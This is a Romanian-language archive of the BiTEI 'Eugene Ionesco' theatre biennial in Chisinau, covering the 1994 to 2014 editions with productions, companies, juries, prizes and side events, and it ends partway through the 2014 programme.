BiTEI 1994-2014

<strong>Festivalul Interna</strong><strong>tional BiTEI-Bienala Teatrului "Eugene Ionesco"</strong>

<strong>Editia I – </strong>25-31 mai, 1994- ?<strong>Planeta Ionesco?</strong>

<strong>Spectacole/ Companii:</strong>

<em>?C</em><em>intareata cheala? – </em>Teatrul Maghiar de Stat (Cluj, Romania);

<em>?Scaunele? – </em>Teatrul ?Archimages? (Moulins, Franta);

<em>?Rincon Oscuro? -</em> Teatro del Norte (Spania);

<em>?Regele moare? -</em> Centrul de cultura franceza (Moscova, Rusia);

<em>?Rinocerii? -</em> Teatrul de pantomima (Caunas, Lituania);

<em>?Delir in doi?</em> – Millesgarden (Stockholm, Suedia);

<em>?Lectia? -</em> Teatrul ?<em>U Nikitskih vorot? (</em>Moscova, Rusia);

<em>?Jocul de-a macelul? -</em> Teatrul<em> ?Bulandra?</em> (Bucuresti, Romania);

<em>?Macbeth?</em> – Teatrul ?<em>Luceafarul</em>? (Chisinau, Moldova);

<em>?Regele moare?</em> – Teatrul ?<em>Eugene Ionesco</em>? (Chisinau, Moldova);

<em>?Delir in doi? -</em> Teatrul National ?Vasile Alecsandri? (Balti, Moldova).

<strong>Juriul:</strong>

Kenneth Campbell – regizor, profesor universitar (SUA) – presedintele juriului;

Valentina Tazlauanu – jurnalist, critic de teatru;

Cristina Dumitrescu – critic de teatru (Romania);

Dorina Tudoran – publicist, scriitor (SUA).

<strong>Premiile Festivalului:</strong>

Premiul pentru cel mai bun spectacol – ?Cantareata cheala? (regia Tompa Gabor), Teatrul Maghiar din Cluj-Napoca, Romania;

Premiul pentru cea mai buna regie – Tompa Gabor pentru spectacolul ?Cantareata cheala?, Cluj-Napoca, Romania;

Premiul pentru cel mai bun rol feminin – Ala Mensicov pentru Regina Margareta in spectacolul ,,Regele moare? la Teatrul Eugene Ionesco, Chisinau;

Premiul pentru cel mai bun rol masculin – Serghei Iurschi pentru regele Berenger I in spectacolul ,,Regele moare? al Centrului Cultural Francez, Moscova;

Premiul special al juriului – Petru Vutcarau, Teatrul Eugene Ionesco, Chisinau, Republica Moldova.

&nbsp;

<strong>Editia II – </strong>24-30 mai, 1997 <strong>- ?Traditie si modernitate?
</strong>

<strong>Spectacole/ Companii:</strong>

?Hamlet? de William Shakespeare, Teatrul National ?Mihai Eminescu? (Chisinau, Moldova);

?Mincinosul? de Carlo Goldoni, Teatrul ?G.Matteotti? (Italia);

?Revizorul? de Nikolai Gogol, Teatrul ?Eugene Ionesco? (Chisinau, Moldova);

?Si cu violoncelul ce facem?? de Matei Visniec, Teatrul de Stat (Oradea, Romania);

?Shinodazuma-Kou? – Compania ?Kyorakuza? (Japonia);

?Nepoata lui Gulliver? de Roland Topor, Les Oiseaux de Passage (Die, Franta);

?Don Juan? de Benoit Vitse, Teatrul ?Luceafarul? (Chisinau, Moldova);

?Copiii soarelui? de Maxim Gorki, Teatrul Mic (Bucuresti, Romania);

?Insemnarile unui nebun? de Nikolai Gogol, Teatrul ?M.Eminescu? (Botosani, Romania);

?Caii la fereastra? de Matei Visniec, Teatrul ?Osobniak? (Sankt-Petersburg, Rusia);

?Scaunele? de Eugene Ionesco, Institutul de Arte (Chisinau, Moldova);

?In culisele paradisului? de Michele Smith, Teatrul ?Smith-Gilmour? (Canada).

<strong>Evenimente:</strong>

Workshop – ?Tehnica actorului?;

Intalnire cu Matei Visniec;

Art-Show – ?Afisul teatral?

Conferinta – ?Teatrul traditional japonez?.

&nbsp;

<strong>Edi?ia III -</strong> 25 mai – 2 iunie, 1999 <strong>- ?Intalniri la sfarsit de secol?</strong>

<strong>Spectacole/ Companii:</strong>

?Visul unei nopti de vara? de William Shakespeare, Teatrul ?Eugene Ionesco? (Chisinau, Moldova);

?Un clov batran cu inima fugara? de Matei Visniec, Changement de Decor (Paris, Franta);

?Kyogen?, teatru traditional japonez – Compania ?Yorozu-Kyogen? (Japonia);

?Hamlet? de William Shakespeare, Teatrul ?Mihai Eminescu? (Botosani, Romania);

?Inteleptul? de Ostrovski, Teatrul ?Luceafarul? (Chisinau, Moldova);

?Farse si fantezii / Sase persoane in cautarea vantului? – Teatrul Farsi (Sankt-Petersburg, Rusia);

?Sluga la doi stapani? de Carlo Goldoni, Teatrul ?A. P. Cehov? (Chisinau, Moldova);

?O intamplare caraghioasa s-a petrecut in drum spre Forul Roman? de B.Shevelove si L.Gilbart, Teatrul National ?Mihai Eminescu? (Chisinau, Moldova);

?Metamorfozele? dupa Ovidiu, Teatrul ?Satiricus? (Chisinau, Moldova);

?Noaptea incurcaturilor? de Oliver Goldsmith, Teatrul Mic (Bucuresti, Romania);

?Cu oalele sparte? dupa Alexandr Puschin, Teatrul ?Licurici? (Chisinau, Moldova);

?Zeita noastra? de Massimo Bontempelli, Teatro delli Dieci (Italia);

?Tri Neck 69? – Alfred ve Dvore (Praga, Cehia);

?Ubu Rex cu scene din Macbeth? dupa Alfred Jarry si William Shakespeare, Teatrul National (Craiova, Romania).

<strong>Evenimente:</strong>

Prezentarea revistei UBU;

Conferinta – ?Teatrul romanesc si problemele identitatii culturale?;

Conferinta – ?Arta teatrala japoneza?;

Workshop – ?Modalitati de cooperare internationala a criticilor de teatru?;

Workshop – ?Coregrafie si miscare scenica?;

Workshop – ?De la text la imaginea scenica?;

Workshop – ?Calatorie in lumea expresiei corporale?.

<strong>?</strong>

<strong>EDITIA IV – </strong>24-31 mai, 2001<strong> – ?Interferen?e?
</strong>

<strong>Spectacole/ Companii:</strong>

?Fecioara si moartea? de Ariel Dorfman, Teatrul National ?Vasile Alecsandri? (Iasi, Romania);

?Maestrul si Margareta? de Mihail Bulgakov, Teatrul ?Satiricus? (Chisinau, Moldova);

?Cererea in casatorie? de Anton Cehov, Teatrul ?Sica Alexandrescu? (Brasov, Romania);

?Tartuffe? de Moliere, Teatrul National ?V.Alecsandri? (Iasi, Romania);

?Regina-mama? de Manlio Santanelli, Teatrul National (Bucuresti, Romania);

?Fantastica si trista poveste a candidei Erendira si a nesabuitei sale bunici? dupa Gabriel Garcia Marquez, Teatrul de Stat (Oradea, Romania);

?Casatoria? de Nikolai Gogol, Teatrul Dramatic Rus ?A. P. Cehov? (Chisinau, Moldova);

?Chagall, Chagall? – Teatrul Yakub Kolas (Vitebsk, Belarus);

?Istoria comunismului povestita pentru bolnavii mintal? de Matei Visniec, Teatrul ?Eugene Ionesco? (Chisinau, Moldova);

?Casatoria? (asociatii dupa Gogol) – Teatrul Muzical-Dramatic ?Taras Sevcenko? (Cerkassi, Ucraina);

?Topor-moi? de Roland Topor, Les Oiseaux Passages (Die, Franta);

?Trei surori? de A.Cehov, Teatrul Dramatic Rus ?A. P. Cehov? (Chisinau, Moldova);

?Unul (celalalt)? – Perpetual Motion Theater (Londra, Regatul Unit);

?Jucatorii? de Nikolai Gogol, Teatrul de Drama si Comedie (Tiraspol, Moldova);

?Nebuni din dragoste? de Tom Sheppard, Teatrul ?Voskresenia? (Lvov, Ucraina);

?Cerere in casatorie? de Anton Cehov, El majordomo (Sevilla, Spania);

?D-ale carnavalului? de I.L.Caragiale, Teatrul ?Luceafarul? (Chisinau, Moldova);

?Materiale Othello? – Angelus 99 (Japonia).

<strong>Spectacole ale ?colilor de teatru:</strong>

?Pescarusul? de A. P. Cehov – Universitatea de Arte ?George Enescu? (Iasi, Romania);

?Viata omului? de Leonid Andreev – Universitatea de Arte ?George Enescu? (Iasi, Romania);

?Un tramvai numit dorinta? de Tennesee Williams – Universitatea de Arte (Chisinau, Moldova);

?Calatoria mastii? – Universitatea de Arte (Chisinau, Moldova);

?Argonautii? – Teatranza (Moncalieri, Italia).

<strong>Evenimente:</strong>

Lansarea numarului special al revistei ?SUD-EST?, dedicat aniversarii de 10 ani de la fondarea Teatrului ,,Eugene Ionesco?;

Conferinta – ?Traditia teatrala japoneza in teatrul modern?;

Atelier de regie – ?Explorarea unei metode de montare?;

Atelier de dramaturgie – Matei Visniec, dramaturg.

&nbsp;

<strong>Edi?ia</strong><strong> V -</strong> 22-31 mai, 2003<strong> – ?Teatru fara frontiere?</strong>

<strong>Spectacole/ Companii:
</strong>

?Cand Isadora dansa? de Martin Sherman, Teatrul National ?Mihai Eminescu? (Chisinau, Moldova);

?Regele Lear? de William Shakespeare, Teatrul Dramatic Rus ?A. P. Cehov? (Chisinau, Moldova);

?Don Juan? de Moliere, Officina Per la Scena, Coordinamento Moncalieri Teatro (Italia);

?O scrisoare pierduta? de Ion Luca Caragiale, Teatrul ?Satiricus? (Chisinau, Moldova);

?Drept ca o linie? de Luis Alfaro, Teatrul ?Maria Filotti? (Braila, Romania);

?Legatorul de snopi? de Iordan Iovkov, Teatrul ?Sava Dobroplodny? (Silistra, Bulgaria);

?Hamlet. Vise? dupa William Shakespeare, Teatrul Dramatic de Stat ?Taras Sevcenko? (Harkov, Ucraina);

?Visul balcanic? – New balkan wave (Belgrad, Serbia);

?Revizorul? de Nikolai Gogol, Teatrul National ?M.Sorescu? (Craiova, Romania);

?Perfect? – Perpetual Motion Theatre (Londra, Regatul Unit);

?Tragedia poetului? dupa Anna Ahmatova, Teatrul Dramatic Rus ?A. P. Cehov? (Chisinau, Moldova);

?Anonimul venetian? de Giuseppe Berto, Teatrul National ?Radu Stanca? (Sibiu, Romania);

?Printul Oguri Hangan si Printesa Tetute Hime? – Yokohama Boat Theatre (Japonia);

?Zaruri si carti? de Sam Henry Kass, Teatrul ?Luni? de la Green Hours (Bucuresti, Romania);

?Alge. Bernarda?s House Remix? dupa o idee de Federico Garcia Lorca, Teatrul ?Andrei Muresan? (Sfantu Gheorghe, Romania);

?Masinaria Cehov? de Matei Visniec, Teatrul ?Eugene Ionesco? (Chisinau, Moldova);

?Mofturi parfumate? dupa I.L.Caragiale, Teatrul ?Ginta Latina? (Chisinau, Moldova);

?Ziua de maine incepe ieri? – Teatrul de Papusi ?Ognivo? si Teatrul Natiunilor (Moscova, Rusia);

?Sex, drugs and rock?n?roll? dupa Eric Bogosian, Teatrul ?Luni? de la Green Hours (Bucuresti, Romania);

?Iov? de Karol Wojtyla, Teatrul ?Voskresenia? (Lvov, Ucraina);

?Inima de caine? de Mihal Bulgakov, Teatrul National ?V.Alecsandri? (Iasi, Romania).

<strong>Evenimente:</strong>

<strong>Spectacole-lectura. Dramaturgia moderna germana:</strong>

?Chip de foc? de Marius von Mayenburg;

?Norway. Today? de Igor Bauersima.

<strong>Concerte:</strong>

Concert – Ada Milea (Bucuresti, Romania);

Concert – Daniela Mudreac (Chisinau-Tokyo).

<strong>Lansari:</strong>

CD – Jacques Coutureau (Franta) muzica spectacolului ?Masinaria Cehov? de Matei Visniec;

Carte – ?Teatralitatea pre si post-Vahtangov? de Angelina Rosca.

<strong>?</strong>

<strong>Edi?ia VI -</strong> 21-28 mai, 2004 <strong>- ?Planeta Cehov?</strong>

<strong>Spectacole/ Companii:</strong>

?Patimi dupa Andrei? (dupa Salonul nr.6) – Teatrul Dramatic Rus ?A. P. Cehov? (Chisinau, Moldova);

?Salonul nr.6? – Teatrul ?Maria Filotti? (Braila, Romania);

?Ursul? – Teatro Superga de Nichelino (Italia);

?Trei surori? – Teatrul ?Laborlavache? (Hamburg, Germania);

?Despre efectul daunator al tutunului? – Arika Emoto?s One Man Show (Tokyo, Japonia);

?In cautarea sensului pierdut. Unchiul Vanea? – Teatrul National ?Mihai Eminescu? (Chisinau, Moldova);

?Pescarusul? – Teatrul ?Tomcsa Sandor? (Odorheiul Secuiesc, Romania);

?Despre efectul daunator al nostalgiei? – Teatrul National ?V.Alecsandri? (Iasi, Romania);

?Les Mata Tchekov? – Teatrul ?Les Matapeste? (Paris, Franta);

?Livada de visini? – Teatrul Dramatic Rus ?A.P.Cehov? (Chisinau, Moldova).

<strong>Evenimente:</strong>

Expozitie Foto – Spectacole dupa piesele lui Anton Cehov, montate la Teatrul ?KAZE? (Japonia);

Proiectie-video – Spectacolul ?Masinaria Cehov? de Matei Visniec, Teatrul ?Eugene Ionesco? (Chisinau, Moldova).

&nbsp;

<strong>Edi?ia VII -</strong> 16-28 mai, 2006<strong> – ?Intre Orient si Occident?</strong>

<strong>Spectacole/ Companii:</strong>

?Si cu violoncelul ce facem?? de Matei Visniec, Teatrul ?Eugene Ionesco? (Chisinau, Moldova);

?Unchiul Vanea? de A. P. Cehov, Teatrul National ?M.Eminescu? (Chisinau, Moldova);

?Hedda Gabler? de Henrik Ibsen, Teatrul National ?M.Eminescu? (Chisinau, Moldova);

?Femeile lui Picasso. Olga? de Brian McAvera, Grupul Teatral ?Kaze? (Tokyo, Japonia);

?Arta? de Yasmina Reza, Teatrul ?Maria Zankovetzka? (Lvov, Ucraina);

?Ivan Turbinca? dupa Ion Creanga, Teatrul ?Mihai Eminescu? (Botosani, Romania);

?Delir in doi? de Eugene Ionesco, Teatrul de Stat (Ankara, Turcia);

?Cainele, femeia si barbatul? de Cybille Berg, Teatrul de Stat (Ankara, Turcia);

?Piaf?? de Tatiana Andreeva, Teatrul de Papusi ?Gulliver? (Kurgan, Rusia);

?Steaua fara nume? de Mihail Sebastian, Teatrul Dramatic Rus ?A. P. Cehov? (Chisinau, Moldova);

?Ticnita? de Nadejda Ptuskina, Teatrul Dramatic Rus ?A. P. Cehov? (Chisinau, Moldova);

?O noapte de varietati? (De la cafe-chantant la opereta) – Teatro Torino Operetta (Italia);

?New York (Fuckin? City)? de Peca Stefan, Teatrul ?Luni? de la Green Hours (Bucuresti, Romania);

?Profu? ? de Jean Pierre Dopagne, Teatrul ?Luni? de la Green Hours (Bucuresti, Romania);

?Bitter sauce? de Eric Bosgonian (inspirat de Sonetul 118 de Shakespeare), Teatrul ?Luni? de la Green Hours (Bucuresti, Romania);

?Sta sa ploua? de Lia Bugnar, Teatrul ?Luni? de la Green Hours (Bucuresti, Romania);

?Alcool?Amar?Amor? – Teatrul ?Luni? de la Green Hours (Bucuresti, Romania);

?Sectorul S? de Emanuel Parvu, Teatrul ?Luni? de la Green Hours (Bucuresti, Romania);

?Mascariciul? dupa A. P. Cehov, Teatrul ?George Ciprian? (Buzau, Romania);

?Facatoarea de minuni? de William Gibson, Teatrul Tineretului (Moscova, Rusia);

?O urasc pe Helen? de Peca Stefan, ArtCub (Bucuresti, Romania);

?Henryk. Hamlet. Hospital (H.H.H.)? – Studium Teatralne (Varsovia, Polonia);

?Pasagerul umbrelor? cu Etelvino Vazquez, Teatro del Norte (Lugones, Spania);

?El actor iconografico? cu Moises Gonzalez, Teatro del Norte (Lugones, Spania);

?Ateh sau Revelatiile printesei Khazare? de Milorad Pavic, Teatrul National de Opera si Balet (Chisinau, Moldova);

?Angajare de clovn? de Matei Visniec, Cie de L?Oeil Nu (Romans, Franta) – Spectacol prezentat cu sustinerea Aliantei Franceze din Moldova;

?Suita din noiembrie? – Teatrul de Pantomima ?A.Klaipeda? (Lituania);

?Adam Geist? de Dea Loher, Teatrul ?Maria Filotti? (Braila, Romania);

?Au murit, apoi s-au casatorit? de Rapiel Eristavi, Teatrul Academic de Stat ?G. Eristavi? (Gori, Georgia);

?Hamlet? de William Shakespeare, ?Changpa? Theatre (Seoul, Coreea de Sud);

?Pragul? – Teatro delle Radici (Lugano, Elvetia);

?Revizorul? de Nikolai Gogol, Teatrul de Papusi ?Ognivo? (Matisci, Rusia);

?Cenusareasa? dupa Charles Perrault, Teatrul de Papusi ?Ognivo? (Matisci, Rusia);

?Obarsia? – Black Tent Theatre (Tokyo, Japonia) – in colaborare cu ?Nottle? Theatre (Coreea de Sud) si Teatrul ?Eugene Ionesco? (Moldova);

?Oratorii pisicilor turbate? dupa I.L.Caragiale, cu Ilie Gheorghe, Teatrul National ?Marin Sorescu? (Craiova, Romania);

?Romeo si Julieta? de William Shakespeare, Teatrul National ?Marin Sorescu? (Craiova, Romania);

?Casa Bernardei Alba? de Federico Garcia Lorca, Teatrul Municipal ?Bacovia? (Bacau, Romania);

?Face and Phases? – Dance Company ?Nomade-s? (Tokyo, Japonia);

?Intoarcerea? – ?Nottle? Theatre (Seoul, Coreea de Sud) – in colaborare cu Black Tent Theatre (Japonia).

<strong>Evenimente:</strong>

<strong>Lansare de carte si revista (Fonda?ia ?Camil Petrescu?):
</strong>Revista – ?Teatrul azi?<strong>;</strong>

Carte – ?Mnemosina, bunica lui Orfeu? de Catalina Buzoianu;

Revista – ?Camil Petrescu-insemnari teatrale?, editie ingrjita de Florica Ichim

?Teatru spaniol contemporan?;

Carte – ?Mastile lui Alexander Hausvater? de Cristina Modreanu;

Prezentare – Florica Ichim, critic de teatru (Romania);

?Teatrul si timpul? de Elfrida Coroliov;

Vernisarea expozitie de pictura – Willemijn van Asbeck (Olanda);

Film – ?Alegerea lui Alexandru Sutto? de Dumitru Crudu, regia Dominic Dembinski;

Prelegere – ?Cultura romaneasca de la Est la Vest. Si invers? – Marian Popescu, prof.univer., doctor, critic de teatru (Romania);

<strong>Lansari:</strong>
Revista ?Teatractie? – editie speciala, dedicata integral Teatrului ?Eugene Ionesco?;

Album aniversar – ?Teatrul ?Eugene Ionesco? – 15 ani fara sediu?.

&nbsp;

<strong>Edi?ia</strong><strong> VIII -</strong> 24 mai – 1 iunie, 2008<strong> – ?Intersectii?</strong>

<strong>Spectacole/ Companii:</strong>

?Un suflet pentru o papusa? de Adrian Graur, Teatrul National ?Vasile Alecsandri? (Balti, Moldova);

?Elisabeta I? de Paul Foster, Teatrul ?Eugene Ionesco? (Chisinau, Moldova);

?Quijote? dupa Miguel de Cervantes, cu Ada Milea (Bucuresti, Romania);

?Fata babei si fata mosneagului? de Ion Creanga, Teatrul Republican de Papusi ?Licurici? (Chisinau, Moldova);

?Lectia? de Eugene Ionesco, Teatrul ?Takyo Kandenki? (Japonia);

?Angajare de clovn? de Matei Visniec, Teatrul ?Maria Filotti? (Braila, Romania);

?Ploaia?(Bolero)?, muzica de J.S.Bach, Teatrul ?Kyiv-modern-ballet? (Kiev, Ucraina);

?Legenda despre inima de aur? – Teatrul de Papusi ?Ognivo? (Matisci, Rusia);

?Liliacul persan? dupa Nikolai Koleada, cu Lia Ahedjakova si Mihail Jeglov (Moscova, Rusia);

?Carmen.TV? – Teatrul ?Kyiv modern-ballet? (Kiev, Ucraina);

?Fana?a: Revenire la Ranjha? – Navtej Prohaska (Croatia);

?Marlene Dietrich? cu Ksenja Prohaska (Croatia);

?Alchimistul halucinatiilor? inspirat din poemul lui Zbigniew Herbert ?Dl. Cagito?, Teatr Okazjonalny (Sopot, Polonia);

?Karagoz-Vrajitoarele si Fakirul indian? – Teatrul ?Tempo? (Ankara, Turcia);

?Privighetoarea si trandafirul? de Oscar Wilde, Teatrul National (Bucuresti, Romania);

?All that jazz? cu Iulia Rutberg (Moscova, Rusia);

?Ultima ora? de Mihail Sebastian, Teatrul National ?Mihai Eminescu? (Chisinau, Moldova);

?Carmen? de Georges Bizet, Teatrul National de Opera si Balet (Chisinau, Moldova);

?O poveste foarte simpla? de Maria Lado, Teatrul ?Mihai Eminescu? (Botosani, Romania);

?Alb pe alb? de Jose Saramago, Teatr Rondo (Slupsk, Polonia);

?Minunata calatorie a ursilor panda?? de Matei Visniec, Grupul Teatral ?KAZE? (Tokyo, Japonia);

?Casatorie cu de-a sila? de Moliere, Teatrul Dramatic Rus de Stat ?A. P. Cehov? (Chisinau, Moldova);

?Bucurati-va? – Teatr A (Gliwice, Polonia);

?Iscariot/Magdalena? de Tony Barrow, TEN42 Productions (Irlanda);

?Coca Blues? de Ioan Peter, Teatrul National (Timisoara, Romania);

?Salonul nr.6? de A. P. Cehov, Teatrul de Stat (Oradea, Romania);

?Parfum de Malaga? – Trupa de dans Flamenco (Malaga, Spania);

?Cantul dulaului? de Zwy Milshtein, Association AMAVADA (Caen, Franta).

<strong>Evenimente:</strong>

Lansare de carte – ?Dramaturgie basarabeana contemporana – Antologie? de Florica Ichim, Andreea Dumitru, Oana Bors-Fundatia Culturala ?Camil Petrescu?, seria ?Dramaturgi de azi?.

&nbsp;

<strong>Edi?ia IX -</strong> 20 mai – 30 mai, 2010<strong> – ?Pentru o lume mai buna?</strong>

<strong>Spectacole/ Companii:</strong>

?Spargatorul de nuci?, muzica P. I. Ceaikovski, Teatrul ?Kyiv modern-ballet? (Kiev, Ucraina);

?Romania! Te pup!? de Bogdan Georgescu, Teatrul National ?Vasile Alecsandri? (Iasi, Romania);

?Fratii Karamazov? de F. M. Dostoievschi, Teatrul Dramatic Rus ?A. P. Cehov? (Chisinau, Moldova);

?Conexiune (In memoria lui Alexei)? – Teatrul de Dans Contemporan ?Voices? (Moldova) si Teatrul de Dans Contemporan ?Potoki? (Dnepropetrovsk, Ucraina);

?Regi, regine si alti sefi? – Coproductie ?Lava-dansproduction? (Suedia), ?Voices? (Moldova), ?Potoki? (Ucraina) si ?Quadro? (Belarus);

?Fanfara-zeci prajini? – Spectacol muzical (Romania);

?ABC-ul papusilor? – Spectacol nonverbal, Teatrul de Stat de Papusi pentru Tineret (Tallinn, Estonia);

?Omul cel bun din Siciuan? dupa Bertolt Brecht, Teatrul Republican ?Luceafarul? (Chisinau, Moldova);

?Pyramus &amp; This be 4 You? dupa William Shakespeare, Teatrul ?Odeon? (Bucuresti, Romania);

?Vladimir Visotki in gesturi? – Spectacol-balada pe melodiile lui Visotki (Moscova, Rusia);

?In container? de Constantin Cheianu – Teatrul ?Odeon? (Bucuresti, Romania);

?Insemnarile unui nebun? de N. V. Gogol, Teatrul ?Cinematografic? (Moscova, Russia);

?Jucatorii? de N. V. Gogol, Teatrul de Stat de Papusi pentru Tineret (Tallinn, Estonia);

?Obsedata de dragoste? dupa Brian McAvera, Teatrul Regional de Stat de Papusi (Sakhalin, Rusia);

?Budinca din banana si gutuie cu coniac si rom? – Teatrul Dramatic de Stat ?Ilya Chavchavadze? (Batumi, Georgia);

?Luceafarul? de Mihai Eminescu, Teatrul Republican de Papusi ?Licurici? (Chisinau, Moldova);

Spectacol de muzica si dans traditional din Rajastan – Grupul Roma ?Dhoad? (Rajastan, India);

?Cameristele? de Jean Genet, Teatrul lui Roman Viktiuk (Moscova, Rusia);

?Drumul nebunului? de Gungor Dilmor, Teatrul de Stat (Trabzon, Turcia);

?R&amp;J: Romeo si Julietta? dupa William Shakespeare, Teatrul lui Roman Viktiuk (Moscova, Rusia);

?Livada de visini? de A.P.Cehov, Teatrul de Papusi ?Ognivo? (Matisci, Rusia);

?Metamorfoza? de F.Kafka, Compania de Teatru ?Mode? (Tokyo, Japonia);

?Spectacol de folclor autentic romanesc: Grigore Lese si invitatii sai din Tara Lapusului, Hori si Zacali morosenesti? – I.Pop si grupul folcloric ?Iza? (Romania).

<strong>?</strong>

<strong>Edi?ia X -</strong> 25 mai – 3 iunie, 2012<strong> – ?Teatrele se intalnesc la Chisinau?</strong>

<strong>Spectacole/ Companii:</strong>

Spectacolul de muzica si dans traditional coreean – Grupul traditional de percutie ?Tae-Geuk? (Coreea de Sud);

?Iosif si amanta sa? de Val Butnaru, regia Petru Vutcarau, Teatrul ?Eugene Ionesco? (Chisinau, Moldova);

?Spovedania unei masti? dupa romanul lui Yukio Mishima, regia Inna Sokolova-Gordon, Teatrul ?Scena rusy? (Berlin, Germania);

?Troia?s discount? regia: Stefano Ricci, Compania Ricci/Forte (Roma, Italia);

Spectacol muzical – The tiger lillies band (Londra, Regatul Unit);

?Statia de autobuz? de Den Fujita, Compania de Teatru ?Hachimaru? (Tokyo, Japonia);

?Crapul? de Masayuki Moriyama, regia Den Fujita, Compania de Teatru ?Hachimaru? (Tokyo, Japonia);

?Angajare de clovn? de Matei Visniec, regia Giorgi Tavadze, Teatrul Dramatic de Stat ?Ilya Chavchavadze? (Batumi, Georgia);

?Pocainta? de Huseynbala Miralamov, regia Bahram Osmanov, Teatrul Academic de Stat (Baku, Azerbaidjan);

?Actrita? regia Elvira Rimbu, Compania ?Cursuri de Teatru? (Oradea, Romania);

?Culorile? spectacol de dans, regia Inoue Omo, Compania Drastic Dance ?O? (Tokyo, Japonia);

?Yanik? de Wajdi Mouawad, regia Cem Emuler, Teatrul de Stat (Istanbul, Turcia);

?Miriam W.? de Savyon Liebrecht, regia Radu Afrim, Teatrul ?Toma Caragiu? (Ploiesti, Romania);

?Carmina Burana? de Carl Off, spectacol de dans, regia Maya Schapira, Compania de Dans ?Kamea? (Tel-Aviv, Israel), in colaborare cu Orchestra si Corul Teatrului National de Opera si Balet (Chisinau, Moldova), dirijor Razvan Cernat;

Concert de muzica etno-jazz – Formatia ?Trigon?;

?Pomul vietii? de Dumitru Matcovschi, regia Alexandru Cozub, Teatrul National ?Mihai Eminescu? (Chisinau, Moldova);

?Pupila? dupa Aleksandr Ostrovski, regia Lev Erenburg, Teatrul ?Popojedem? (Praga, Cehia);

?Salomeea? dupa Oscar Wilde, regia Roman Viktyuk, Teatrul lui Roman Viktyuk (Moscova, Rusia);

?Mereu simt acelasi lucru? – spectacol de dans flamenco, regia Adrian Santana, Compania ?Adrian Santana? (Madrid, Spania);

?Maestrul si Margareta? dupa Mihail Bulgakov, regia Roman Viktyuk, Teatrul lui Roman Viktyuk (Moscova, Rusia);

?Principesa Ivona? de Witold Gombrowicz, regia Vlad Ciobanu, Teatrul ?Eugene Ionesco? (Chisinau, Moldova);

?Underground? de Peters Vaskis, in regia lui Radu Poclitaru, Teatrul ?Kyiv Modern-Ballet? (Ucraina);

?Salonul nr. 6? dupa A.P.Cehov, in regia lui Radu Poclitaru, Teatrul ?Kyiv Modern-Ballet? (Ucraina);

?Cameristele? de Jean Genet, regia Akira Okamoto, Compania de Teatru ,,Ren?niku kobo? (Kashiwa, Japonia);

?Caii la fereastra? de Matei Visniec, regia Petru Vutcarau, Teatrul ?Mihai Eminescu? (Botosani, Romania);

?Boala familiei M? de Fausto Paravidino, regia Radu Afrim, Teatrul ?Mihai Eminescu? (Timisoara, Romania);

?Hamlet.COMX? dupa William Shakespeare, regia Levan Khvichia, Teatrul Academic de Stat ?Sota Rustaveli? (Tbilisi, Georgia);

?Casatoria? de Nikolai Gogol, regia Yuriy Kordonskiy, Teatrul ?Bulandra? (Bucuresti, Romania).

<strong>Evenimente:</strong>

Conferinta de presa sustinuta de Grupul traditional de percutie ?Tae-Geuk?;

Conferinta de presa sustinuta de Compania ?Ricci/Forte?;

Conferinta de presa sustinuta de Teatrul ?Scena rusy?;

Lansarea volumelor ?Matei Visniec. Mirajul cuvintelor calde? de Daniela Magiaru (Editura Institutului Cultural Roman) si ?Opera poetica a lui Matei Visniec? (2 volume) de Gheorghe Erizanu (Editura Cartier);

Conferinta de presa sustinuta de Compania de Teatru ?Hachimaru?;

Conferinta de presa sustinuta de Teatrul Dramatic de Stat ?Ilya Chavchavadze?;

Conferinta de presa sustinuta de Teatrul Academic de Stat din Baku;

Conferinta de presa sustinuta de Compania Drastic Dance ,?O?;

Conferinta de presa sustinuta de Teatrul de Stat din Istanbul;

Conferinta de presa sustinuta de Elvira Rimbu, regizorul spectacolului ?Actrita?;

Biblioteca de teatru ideala: aparitii editoriale recente ale Fundatiei Culturale ?Camil Petrescu? si revistei ?Teatrul azi?:
<ol>
<li>Regia romaneasca, doua repere de ieri si azi: Aurel Ion Maican si Silviu Purcarete in exegeze critice: ?Un regizor uitat: Aurel Ion Maican? de Vera Molea si ?Silviu Purcarete sau privirea care infatiseaza? de Oltita Cantec;</li>
<li>Shakespeare in lecturi critici romanesti si straine: ?Shakespeare-textul ca partitura de joc? de Ana Maria Narti si ?Citindu-l pe Shakespeare? de Andrzej Zurowski;</li>
<li>Prezentarea revistei ?TEATRUL AZI? nr.5-6-7/2012: Focus asupra Festivalului International al Artelor Scenice, BITEI 2012.</li>
</ol>
Conferinta de presa sustinuta de Compania de Dans ?Kamea? (Tel-Aviv, Israel);

Conferinta de presa sustinuta de Teatrul ?Toma Caragiu? (Ploiesti, Romania);

Conferinta de presa sustinuta de Teatrul ?Popojedem? (Praga, Cehia);

Conferinta de presa sustinuta de Teatrul lui Roman Viktyuk (Moscova, Rusia);

Prelegerea – ?Teatrul ceh contemporan? sustinuta de criticul de teatru Vlasta Smolahova (Cehia);

Conferinta de presa sustinuta de Teatrul ?Kyiv Modern-Ballet?;

Lansarea volumului (in limba rusa) – ?Teatru.Clasica. Stil? de Elfrida Koroliova;

Lansarea volumului – ?Teatrul Eugene Ionesco-Istoria unei didente? de Dina Ghimpu;

Conferinta de presa sustinuta de Compania de Teatru ?Ren?niku kobo? (Kashiwa, Japonia)

Conferinta de presa sustinuta de Teatrul ?Mihai Eminescu? (Botosani, Romania);

Conferinta de presa sustinuta de Teatrul ?Mihai Eminescu? (Timisoara, Romania);

<strong>?</strong>

<strong>Edi?ia XI -</strong> 21 mai – 15 iunie, 2014 <strong>- ?Make theatre, not war?</strong>

<strong>Spectacole/ Companii:</strong>

?Oscar si tanti Roz? de Eric-Emmanuel Schmitt, in regia lui Petru Vutcarau, Teatrul ?Eugene Ionesco? (Chisinau, Moldova);

?Duel Opus 2? – spectacol muzical sustinut de Laurent Cirade si Paul Staicu, Compania ?BRAF? (Franta);

?Iosif si amanta sa? de Val Butnaru, in regia lui Petru Vutcarau, Teatrul ?Eugene Ionesco? (Chisinau, Moldova);

?Caruselul Erotic? dupa David Hare, in regia lui Giorgi Tavadze, Teatrul ?Eugene Ionesco? (Chisinau, Moldova);

?Cele cinci bandite? de Kawatake Mokuami, in regia lui Den Fujita, Compania de Teatru ?Hachimaru? (Japonia);

?Clasa noastra? de Tadeusz Slobodzianek, in regia Luminitei Ticu, Teatrul ?Eugene Ionesco? (Chisinau, Moldova);

?Hamlet? de William Shakespeare, in regia lui Dominic Dromgoole si Bill Buckhurst, Teatrul ?Globe? (Regatul Unit);

?Concert cu bucati din concerte? de Ada Milea (Cluj-Napoca, Romania);

